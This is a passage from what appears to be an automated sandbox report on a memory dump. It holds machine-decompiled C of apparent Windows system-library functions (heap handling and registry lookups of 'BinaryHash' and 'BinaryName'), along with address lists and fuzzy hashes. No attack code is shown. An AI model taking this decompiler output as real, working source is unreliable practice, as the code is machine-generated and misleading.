									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E00C095D0();
										L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E00BFF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                                        0x00bc52a5
                                                                                        0x00bc52ad
                                                                                        0x00bc52b0
                                                                                        0x00bc52b3
                                                                                        0x00bc52b7
                                                                                        0x00bc52ba
                                                                                        0x00bc52bf
                                                                                        0x00bc52c4
                                                                                        0x00bc52cc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bc52ce
                                                                                        0x00bc52d9
                                                                                        0x00bc52dd
                                                                                        0x00bc52e7
                                                                                        0x00bc52f7
                                                                                        0x00bc52f9
                                                                                        0x00bc52fd
                                                                                        0x00c20dcf
                                                                                        0x00c20dd5
                                                                                        0x00c20dd6
                                                                                        0x00c20dd7
                                                                                        0x00c20dd8
                                                                                        0x00c20dd9
                                                                                        0x00c20dde
                                                                                        0x00c20ddf
                                                                                        0x00c20de0
                                                                                        0x00c20de1
                                                                                        0x00c20de2
                                                                                        0x00c20de5
                                                                                        0x00c20dea
                                                                                        0x00c20dec
                                                                                        0x00c20f60
                                                                                        0x00c20f64
                                                                                        0x00c20f70
                                                                                        0x00c20f76
                                                                                        0x00c20f79
                                                                                        0x00c20f79
                                                                                        0x00000000
                                                                                        0x00c20f64
                                                                                        0x00c20df2
                                                                                        0x00c20df7
                                                                                        0x00c20e04
                                                                                        0x00c20e0d
                                                                                        0x00c20e0d
                                                                                        0x00c20e10
                                                                                        0x00c20e1a
                                                                                        0x00c20e1c
                                                                                        0x00c20e4c
                                                                                        0x00c20e52
                                                                                        0x00c20e61
                                                                                        0x00c20e67
                                                                                        0x00c20e6b
                                                                                        0x00c20e70
                                                                                        0x00c20e76
                                                                                        0x00c20ed7
                                                                                        0x00c20edc
                                                                                        0x00c20ee0
                                                                                        0x00c20ee6
                                                                                        0x00c20eea
                                                                                        0x00c20eed
                                                                                        0x00c20ef0
                                                                                        0x00c20ef3
                                                                                        0x00c20ef6
                                                                                        0x00c20ef9
                                                                                        0x00c20efe
                                                                                        0x00c20f01
                                                                                        0x00c20f01
                                                                                        0x00c20f0b
                                                                                        0x00c20f12
                                                                                        0x00c20f16
                                                                                        0x00c20f18
                                                                                        0x00c20f1b
                                                                                        0x00c20f2c
                                                                                        0x00c20f31
                                                                                        0x00c20f31
                                                                                        0x00c20f35
                                                                                        0x00c20f39
                                                                                        0x00c20f3a
                                                                                        0x00c20f3c
                                                                                        0x00c20f3f
                                                                                        0x00c20f50
                                                                                        0x00c20f55
                                                                                        0x00c20f55
                                                                                        0x00c20f59
                                                                                        0x00bc52eb
                                                                                        0x00bc52f1
                                                                                        0x00bc52f1
                                                                                        0x00c20e7d
                                                                                        0x00c20e84
                                                                                        0x00c20e88
                                                                                        0x00c20e8a
                                                                                        0x00c20e8d
                                                                                        0x00c20e9e
                                                                                        0x00c20ea3
                                                                                        0x00c20ea3
                                                                                        0x00c20ea7
                                                                                        0x00c20eaf
                                                                                        0x00c20eb3
                                                                                        0x00c20eb9
                                                                                        0x00c20eb9
                                                                                        0x00c20ebc
                                                                                        0x00c20ecd
                                                                                        0x00c20ecd
                                                                                        0x00000000
                                                                                        0x00c20eb3
                                                                                        0x00c20e21
                                                                                        0x00c20e2b
                                                                                        0x00c20e2f
                                                                                        0x00c20e30
                                                                                        0x00c20e3a
                                                                                        0x00c20e3f
                                                                                        0x00c20e41
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c20e47
                                                                                        0x00000000
                                                                                        0x00c20e47
                                                                                        0x00c20df9
                                                                                        0x00c20dfe
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c20dfe
                                                                                        0x00bc5303
                                                                                        0x00bc5307
                                                                                        0x00000000
                                                                                        0x00bc5309
                                                                                        0x00000000
                                                                                        0x00bc5309
                                                                                        0x00bc5307
                                                                                        0x00bc52e9
                                                                                        0x00bc52e9
                                                                                        0x00000000
                                                                                        0x00bc52e9
                                                                                        0x00bc530e
                                                                                        0x00000000

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0,v
                                                                                        • API String ID: 0-1534952229
                                                                                        • Opcode ID: 337c603374da00559d9ff774e81196a0e470f019d333c16fb478ce6a5caec79d
                                                                                        • Instruction ID: 151c6e39f0770efc1e271b4d2bd6e5c9d16ca9e5c44414df53c8da64d02b3cfd
                                                                                        • Opcode Fuzzy Hash: 337c603374da00559d9ff774e81196a0e470f019d333c16fb478ce6a5caec79d
                                                                                        • Instruction Fuzzy Hash: 5951CF711457419BD721EF64C842B27BBE4FF90710F240A6EF4A58BA92EB70F884D792
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C90EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 80%
                                                                                        			E00C90EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E00C8FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E00C91074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E00C09730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E00C8A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E00C8A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0xcb8b04 >> 0x14) + (_v44 -  *0xcb8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E00BE7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E00C8138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E00BE7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E00C7FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0xcb8724 & 0x00000008) != 0) {
						E00C852F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E00C915B5(0xcb8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                                        0x00c90eb7
                                                                                        0x00c90eb9
                                                                                        0x00c90ec0
                                                                                        0x00c90ec2
                                                                                        0x00c90ecd
                                                                                        0x00c9105b
                                                                                        0x00c9105b
                                                                                        0x00c91061
                                                                                        0x00c91066
                                                                                        0x00c91066
                                                                                        0x00c9106b
                                                                                        0x00c91073
                                                                                        0x00c91073
                                                                                        0x00c90ed3
                                                                                        0x00c90ed6
                                                                                        0x00c90edc
                                                                                        0x00c90ee0
                                                                                        0x00c90ee7
                                                                                        0x00c90ef0
                                                                                        0x00c90ef5
                                                                                        0x00c90efa
                                                                                        0x00c90efc
                                                                                        0x00c90efd
                                                                                        0x00c90f03
                                                                                        0x00c90f04
                                                                                        0x00c90f06
                                                                                        0x00c90f07
                                                                                        0x00c90f09
                                                                                        0x00c90f0e
                                                                                        0x00c90f14
                                                                                        0x00c90f23
                                                                                        0x00c90f2d
                                                                                        0x00c90f34
                                                                                        0x00c90f34
                                                                                        0x00c90f14
                                                                                        0x00c90f52
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c90f58
                                                                                        0x00c90f73
                                                                                        0x00c90f74
                                                                                        0x00c90f79
                                                                                        0x00c90f7d
                                                                                        0x00c90f80
                                                                                        0x00c90f86
                                                                                        0x00c90fab
                                                                                        0x00c90fb5
                                                                                        0x00c90fc6
                                                                                        0x00c90fd1
                                                                                        0x00c90fe3
                                                                                        0x00c90fd3
                                                                                        0x00c90fdc
                                                                                        0x00c90fdc
                                                                                        0x00c90feb
                                                                                        0x00c91009
                                                                                        0x00c91009
                                                                                        0x00c91015
                                                                                        0x00c91027
                                                                                        0x00c91017
                                                                                        0x00c91020
                                                                                        0x00c91020
                                                                                        0x00c9102f
                                                                                        0x00c9103c
                                                                                        0x00c9103c
                                                                                        0x00c91048
                                                                                        0x00c91050
                                                                                        0x00c91050
                                                                                        0x00c91055
                                                                                        0x00000000
                                                                                        0x00c91055
                                                                                        0x00c90f88
                                                                                        0x00c90f9e
                                                                                        0x00c90fa2
                                                                                        0x00c90fa9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c90fa9
                                                                                        0x00000000

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: `
                                                                                        • API String ID: 0-2679148245
                                                                                        • Opcode ID: e1876b6f14212b409ae49e9bec0318371e32fd1cba9e509863d8c0919cb15a50
                                                                                        • Instruction ID: e94683aabb6ed508423c7dea8e9f63d01b29e6b883402da9f0e1d6e9f0d8d4fe
                                                                                        • Opcode Fuzzy Hash: e1876b6f14212b409ae49e9bec0318371e32fd1cba9e509863d8c0919cb15a50
                                                                                        • Instruction Fuzzy Hash: EA51E3712043829FDB24DF29D889B1BB7E5EBC4304F18092CF95687291DB71ED46C762
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BFF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 75%
                                                                                        			E00BFF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E00BE4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E00C09830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E00C09990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E00C095D0();
							goto L11;
						} else {
							_t109 = L00BE4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E00C0F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E00C095D0();
										L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                        0x00bff0d3
                                                                                        0x00bff0d9
                                                                                        0x00bff0e0
                                                                                        0x00bff0e7
                                                                                        0x00bff0f2
                                                                                        0x00bff0f4
                                                                                        0x00bff0f8
                                                                                        0x00bff100
                                                                                        0x00bff108
                                                                                        0x00bff10d
                                                                                        0x00bff115
                                                                                        0x00bff116
                                                                                        0x00bff11f
                                                                                        0x00bff123
                                                                                        0x00bff124
                                                                                        0x00bff12c
                                                                                        0x00bff130
                                                                                        0x00bff134
                                                                                        0x00bff13d
                                                                                        0x00bff144
                                                                                        0x00bff14b
                                                                                        0x00bff152
                                                                                        0x00c3bab0
                                                                                        0x00c3bab0
                                                                                        0x00bff158
                                                                                        0x00bff158
                                                                                        0x00bff15a
                                                                                        0x00bff160
                                                                                        0x00bff165
                                                                                        0x00bff166
                                                                                        0x00bff16f
                                                                                        0x00bff173
                                                                                        0x00c3baa7
                                                                                        0x00c3baa7
                                                                                        0x00c3baab
                                                                                        0x00000000
                                                                                        0x00bff179
                                                                                        0x00bff18d
                                                                                        0x00bff191
                                                                                        0x00c3baa2
                                                                                        0x00000000
                                                                                        0x00bff197
                                                                                        0x00bff19b
                                                                                        0x00bff1a2
                                                                                        0x00bff1a9
                                                                                        0x00bff1af
                                                                                        0x00bff1b2
                                                                                        0x00bff1b6
                                                                                        0x00bff1b9
                                                                                        0x00bff1c4
                                                                                        0x00bff1d8
                                                                                        0x00bff1df
                                                                                        0x00bff1e3
                                                                                        0x00bff1eb
                                                                                        0x00bff1ee
                                                                                        0x00bff1f4
                                                                                        0x00bff20f
                                                                                        0x00c3bab7
                                                                                        0x00c3babb
                                                                                        0x00c3bacc
                                                                                        0x00c3bad1
                                                                                        0x00bff215
                                                                                        0x00bff218
                                                                                        0x00bff226
                                                                                        0x00bff22b
                                                                                        0x00000000
                                                                                        0x00bff22b
                                                                                        0x00bff1f6
                                                                                        0x00bff1f6
                                                                                        0x00bff1f9
                                                                                        0x00bff1fb
                                                                                        0x00bff1fb
                                                                                        0x00bff1f4
                                                                                        0x00bff191
                                                                                        0x00bff173
                                                                                        0x00bff152
                                                                                        0x00bff203

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @
                                                                                        • API String ID: 0-2766056989
                                                                                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                        • Instruction ID: 5405c9f96482fe15285cc6651e78dfa0a72939fc7656d8c1964c6b050fdaa846
                                                                                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                        • Instruction Fuzzy Hash: 25518871504715AFC320DF29C841A6BBBF8FF48710F008A2EFA95976A1E7B4E944DB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C43540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 75%
                                                                                        			E00C43540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0xcbd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E00C00BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E00C43706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E00C0FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E00C43540;
						E00C0FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E00C1DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E00C50C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E00C097C0();
					}
					return E00C0B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E00C43971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E00C43884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E00C0FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E00C09650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E00C43787(_a4,  &_v352, _t80);
						}
					}
					L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E00C095D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                                        0x00c43552
                                                                                        0x00c4355a
                                                                                        0x00c4355d
                                                                                        0x00c43566
                                                                                        0x00c43567
                                                                                        0x00c4357e
                                                                                        0x00c4358f
                                                                                        0x00c435a1
                                                                                        0x00c435a5
                                                                                        0x00c4366b
                                                                                        0x00c4366b
                                                                                        0x00c4366d
                                                                                        0x00c43672
                                                                                        0x00c43679
                                                                                        0x00c43685
                                                                                        0x00c4368d
                                                                                        0x00c4369d
                                                                                        0x00c436a7
                                                                                        0x00c436b8
                                                                                        0x00c436c6
                                                                                        0x00c436c7
                                                                                        0x00c436dc
                                                                                        0x00c436e1
                                                                                        0x00c436e7
                                                                                        0x00c436e9
                                                                                        0x00c436e9
                                                                                        0x00c43703
                                                                                        0x00c43703
                                                                                        0x00c435b5
                                                                                        0x00c435c0
                                                                                        0x00c435c4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c435ca
                                                                                        0x00c435d7
                                                                                        0x00c435e2
                                                                                        0x00c435e6
                                                                                        0x00c435e8
                                                                                        0x00c435f5
                                                                                        0x00c435fa
                                                                                        0x00c43603
                                                                                        0x00c43604
                                                                                        0x00c43609
                                                                                        0x00c4360a
                                                                                        0x00c43612
                                                                                        0x00c43613
                                                                                        0x00c4361e
                                                                                        0x00c43622
                                                                                        0x00c43628
                                                                                        0x00c4362f
                                                                                        0x00c4362f
                                                                                        0x00c43636
                                                                                        0x00c43638
                                                                                        0x00c4363b
                                                                                        0x00c43642
                                                                                        0x00c43642
                                                                                        0x00c43636
                                                                                        0x00c43657
                                                                                        0x00c43657
                                                                                        0x00c4365c
                                                                                        0x00c43662
                                                                                        0x00c43669
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: BinaryHash
                                                                                        • API String ID: 0-2202222882
                                                                                        • Opcode ID: 5160710140ea61eaa5405381149cebd24063b707293301437b4b12144d86ec5b
                                                                                        • Instruction ID: da8a790c939c889b7ec123ef907b877d9a72e11dff22ce09c1e06b1b21309d2d
                                                                                        • Opcode Fuzzy Hash: 5160710140ea61eaa5405381149cebd24063b707293301437b4b12144d86ec5b
                                                                                        • Instruction Fuzzy Hash: 484143B2D0056DABDB21DA50CC85FDEB77CBB44714F0145A5BA09AB281DB309F88DF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C905AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 71%
                                                                                        			E00C905AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E00C907DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E00C09730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E00C8A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E00C8A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E00C91293(_t79, _v40, E00C907DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E00BE7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E00C8138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                                        0x00c905c5
                                                                                        0x00c905ca
                                                                                        0x00c905d3
                                                                                        0x00c906db
                                                                                        0x00c906db
                                                                                        0x00c906dd
                                                                                        0x00c906e3
                                                                                        0x00c906e3
                                                                                        0x00c905dd
                                                                                        0x00c905e7
                                                                                        0x00c905f6
                                                                                        0x00c90600
                                                                                        0x00c90607
                                                                                        0x00c90610
                                                                                        0x00c90615
                                                                                        0x00c9061a
                                                                                        0x00c9061c
                                                                                        0x00c9061e
                                                                                        0x00c90624
                                                                                        0x00c90625
                                                                                        0x00c90627
                                                                                        0x00c90628
                                                                                        0x00c90631
                                                                                        0x00c90640
                                                                                        0x00c9064d
                                                                                        0x00c90654
                                                                                        0x00c90654
                                                                                        0x00c90631
                                                                                        0x00c9066d
                                                                                        0x00c90674
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c90692
                                                                                        0x00c9069e
                                                                                        0x00c906b0
                                                                                        0x00c906a0
                                                                                        0x00c906a9
                                                                                        0x00c906a9
                                                                                        0x00c906b8
                                                                                        0x00c906d6
                                                                                        0x00c906d6
                                                                                        0x00000000

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: `
                                                                                        • API String ID: 0-2679148245
                                                                                        • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                        • Instruction ID: 60d8f979850d9e64720b848b2fab49aaad85fd59220a3bd8b74ae6c71756244a
                                                                                        • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                        • Instruction Fuzzy Hash: C331E032204345AFEB20DE25CD8AF9A77D9ABC4754F144229FD58DB281D770EE14CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C43884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 72%
                                                                                        			E00C43884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E00C09650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L00BE4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E00C09650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                                        0x00c43893
                                                                                        0x00c43896
                                                                                        0x00c43899
                                                                                        0x00c4389f
                                                                                        0x00c438a0
                                                                                        0x00c438a4
                                                                                        0x00c438a9
                                                                                        0x00c438ac
